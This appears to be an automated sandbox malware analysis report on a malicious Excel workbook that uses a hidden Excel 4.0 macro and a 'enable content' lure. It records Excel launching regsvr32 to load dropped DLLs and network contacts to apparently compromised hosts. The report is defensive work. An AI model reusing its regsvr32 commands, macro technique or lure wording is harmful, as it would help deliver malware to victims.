    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/annapurna-region.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/best-nepal-tour-package.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/8-things-to-do-in-thamel/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/best-time-for-trekking-to-everest-base-camp/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/everest-base-camp-trek-a-complete-guide/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/everest-base-camp-trek-preparation/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/how-difficult-is-everest-base-camp-trek/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/how-to-avoid-helicopter-rescue-scams-in-nepal/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/blog/pikey-peak-trek-a-complete-guide/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/booking.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/classic-nepal-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/company.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/contact-us.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/dolpo-region-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/everest-base-camp-helicopter-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/everest-base-camp-trekking-13-days.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/everest-high-passes-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/everest-kalapathar-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/everest-region.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/everest-renjo-la-pass-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/ghorepani-poon-hill-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/guides-porters-hire.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/images/logo-01.png
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/island-peak-climbing.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/kathmandu-day-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/langtang-region.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/links.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/manaslu-circuit-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/manaslu-region-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/mardi-himal-trekking.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/nepal-family-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/nepal-honey-hunting-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/nepal-honeymoon-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/nepal-jungle-safari-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/nepal-short-and-easy-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/nepal.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/100ntb.png
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/17keep.png
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/22trekking-spot.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/37travelista.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/40resque.png
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/48visa.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/49gov.png
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/5twit.png
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/98taan.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/99master_card.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pagegallery/99nma.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/payment-process.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/pike-peak-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/poon-hill-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/restricted-area-trek.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/review.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/slider/budget-everest-base-camp-trek47.jpg
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/taste-of-nepal-tour.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/team.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/terms-and-conditions.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/trekking-information.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/welcome.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.dreamhimalayan.com/why-with-us.html
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.jscache.com/wejs?wtype=selfserveprop&amp;uniq=109&amp;locationId=6894456&amp;lang=en_US&
    Source: 04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.tripadvisor.com/
    Source: fasol[1].htm.0.drString found in binary or memory: https://www.tripadvisor.com/img/cdsi/img2/branding/150_logo-11900-2.png
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownHTTPS traffic detected: 192.185.48.167:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.113.120:443 -> 192.168.2.4:49735 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS or Android, please use Desktop
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: audit-78958169.xlsbInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: audit-78958169.xlsbInitial sample: Sheet size: 8595
    Source: audit-78958169.xlsbInitial sample: Sheet size: 7538
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: werty2.dllJump to behavior
    Source: classification engineClassification label: mal76.expl.evad.winXLSB@5/12@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{42A2E1CE-882D-48C0-9141-E95BAD5D4240} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\werty1.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\werty2.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\werty1.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\werty2.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: audit-78958169.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: audit-78958169.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: audit-78958169.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: audit-78958169.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: audit-78958169.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: audit-78958169.xlsbInitial sample: OLE zip file path = xl/media/image6.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\werty1.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2DLL Side-Loading1Process Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://www.dreamhimalayan.com0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/dolpo-region-trek.html0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://www.dreamhimalayan.com/everest-base-camp-helicopter-tour.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/0%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://www.dreamhimalayan.com/nepal-short-and-easy-trek.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/blog/everest-base-camp-trek-a-complete-guide/0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/welcome.html0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.dreamhimalayan.com/poon-hill-trek.html0%Avira URL Cloudsafe
    https://www.jscache.com/wejs?wtype=selfserveprop&amp;uniq=109&amp;locationId=6894456&amp;lang=en_US&0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/booking.html0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://www.dreamhimalayan.com/island-peak-climbing.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/everest-kalapathar-trek.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/pagegallery/5twit.png0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://thetravelista.net/2018/04/25/2-week-nepal-itinerary/0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/blog/8-things-to-do-in-thamel/0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/images/logo-01.png0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/review.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/guides-porters-hire.html0%Avira URL Cloudsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://www.dreamhimalayan.com/pagegallery/100ntb.png0%Avira URL Cloudsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://www.dreamhimalayan.com/terms-and-conditions.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/annapurna-region.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/pagegallery/48visa.jpg0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/classic-nepal-tour.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/team.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/pagegallery/22trekking-spot.jpg0%Avira URL Cloudsafe
    https://wus2.pagecontentsync.0%URL Reputationsafe
    https://wus2.pagecontentsync.0%URL Reputationsafe
    https://wus2.pagecontentsync.0%URL Reputationsafe
    https://www.dreamhimalayan.com/nepal.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/pagegallery/37travelista.jpg0%Avira URL Cloudsafe
    https://cortana.ai/api0%URL Reputationsafe
    https://cortana.ai/api0%URL Reputationsafe
    https://cortana.ai/api0%URL Reputationsafe
    https://www.dreamhimalayan.com/kathmandu-day-tour.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/payment-process.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/nepal-family-tour.html0%Avira URL Cloudsafe
    https://www.dreamhimalayan.com/pagegallery/49gov.png0%Avira URL Cloudsafe
    http://www.dreamhimalayan.com/team.html0%Avira URL Cloudsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    http://xenatechnepal.com0%Avira URL Cloudsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://www.dreamhimalayan.com/slider/budget-everest-base-camp-trek47.jpg0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dreamhimalayan.com
    192.185.113.120
    truefalse
      unknown
      forfacks.com
      192.185.48.167
      truefalse
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.dreamhimalayan.comfasol[1].htm.0.drfalse
        • Avira URL Cloud: safe
        unknown
        https://shell.suite.office.com:144304DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
          high
          http://trade.welcomenepal.com/useful-contact/trekking-agenciesfasol[1].htm.0.drfalse
            high
            https://autodiscover-s.outlook.com/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                high
                https://www.dreamhimalayan.com/dolpo-region-trek.htmlfasol[1].htm.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://cdn.entity.04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                  high
                  https://rpsticket.partnerservices.getmicrosoftkey.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://lookup.onenote.com/lookup/geolocation/v104DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                    high
                    https://www.dreamhimalayan.com/everest-base-camp-helicopter-tour.htmlfasol[1].htm.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.dreamhimalayan.com/fasol[1].htm.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                      high
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                        high
                        https://api.aadrm.com/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://www.dreamhimalayan.com/nepal-short-and-easy-trek.htmlfasol[1].htm.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                          high
                          https://api.microsoftstream.com/api/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                            high
                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                              high
                              https://cr.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                high
                                https://www.dreamhimalayan.com/blog/everest-base-camp-trek-a-complete-guide/fasol[1].htm.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.dreamhimalayan.com/welcome.htmlfasol[1].htm.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://res.getmicrosoftkey.com/api/redemptionevents04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://tasks.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                  high
                                  https://officeci.azurewebsites.net/api/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://store.office.cn/addinstemplate04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                    high
                                    https://www.odwebp.svc.ms04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://api.powerbi.com/v1.0/myorg/groups04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                      high
                                      https://web.microsoftstream.com/video/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                        high
                                        https://graph.windows.net04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                          high
                                          https://www.dreamhimalayan.com/poon-hill-trek.htmlfasol[1].htm.0.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.jscache.com/wejs?wtype=selfserveprop&amp;uniq=109&amp;locationId=6894456&amp;lang=en_US&fasol[1].htm.0.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                            high
                                            https://www.dreamhimalayan.com/booking.htmlfasol[1].htm.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ncus.contentsync.04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
